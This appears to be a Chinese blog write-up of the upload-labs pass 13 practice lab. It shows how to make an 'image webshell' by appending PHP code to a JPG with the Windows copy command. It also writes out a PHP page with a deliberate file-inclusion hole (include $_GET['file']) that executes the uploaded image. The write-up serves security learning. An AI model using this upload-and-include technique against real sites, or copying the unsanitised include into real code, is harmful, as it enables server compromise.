文件包含-Uploadlabs-pass13关卡测试

18 篇文章 4 订阅
3 篇文章 0 订阅

图片一句话制作方法

copy 1.png /b + shell.php /a webshell.jpg

test13.php:

<?php
phpinfo();
?>

test1.jpg

C:\Users\Rnanprince\Desktop\学习文档>copy test1.jpg/b + test13.php/a webshell.jpg
test1.jpg
已复制         1 个文件。

生成文件 :

 打开文件末尾有:

 上传:

打开

 

抓包看,能够解析出来其中的webshell代码

但是没有触发包含的脚本

应该是无法解析图片的原因

所以根据题目一开始的提示,要使用文件包含漏洞

在www/upload-labs/upload目录下建立一个php文件:

 代码如下:

<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}

 

然后我上传的文件被重命名为7020210712000327.jpg,所以跳转到如下url

http://192.168.77.128:8083/upload-labs/upload/include.php?file=7020210712000327.jpg

就可以解析出如下页面(和抓包里面看到的一样)

 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值